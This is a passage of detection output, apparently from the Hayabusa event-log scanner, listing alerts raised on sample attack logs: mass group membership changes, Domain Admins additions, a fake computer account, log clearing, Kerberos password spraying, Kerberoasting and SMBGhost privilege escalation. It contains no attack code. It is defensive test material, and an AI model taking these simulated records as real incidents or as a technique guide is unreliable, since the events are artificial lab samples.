Group01",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group01 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group02 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group03",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group03 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group04",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group04 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group05",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group05 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group06",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group06 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group07",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group07 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group08",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group08 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group09",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group09 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group10",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group10 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group11",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group11 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:27:05.579 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx -2020-07-12 14:28:26.831 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx -2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to local Domain Admins group,"User: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalDomainAdminsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx -2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to the global Domain Admins group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalDomainAdmins.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx -2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx -2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Hidden user account created! (Possible Backdoor),User: FAKE-COMPUTER$ : SID:S-1-5-21-4230534742-2542757381-3142984815-1168,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx -2020-07-13 17:34:33.915 +09:00,rootdc1.offsec.lan,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx -2020-07-19 22:06:52.199 +09:00,01566s-win16-ir.threebeesco.com,5145,critical,Protected Storage Service Access,,rules/sigma/builtin/security/win_protected_storage_service_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_protectedstorage_5145_rpc_masterkey.evtx -2020-07-23 05:29:27.321 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD01 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-01 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: bob : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.434 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal : Service: krbtgt : IP Address: 172.16.66.1 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.437 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal : Service: krbtgt : IP Address: ::ffff:172.16.66.1 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx -2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx -2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx -2020-08-02 20:21:46.062 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.068 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.078 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.083 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.088 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.094 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.100 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.110 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.117 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.153 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.166 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:33:06.521 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: : Service: : IP Address: ::ffff:10.23.23.9 : Status: 0x25,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: Svc-SQL-DB01 : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,medium,Suspicious Kerberos RC4 Ticket Encryption,,rules/sigma/builtin/security/win_susp_rc4_kerberos.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:11.847 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:12.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:54.898 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:54.999 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: WEC01$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:55.142 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:55.483 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:55.484 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:55.625 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 21:02:34.103 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55731 : LogonID: 0x11b8c41e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using 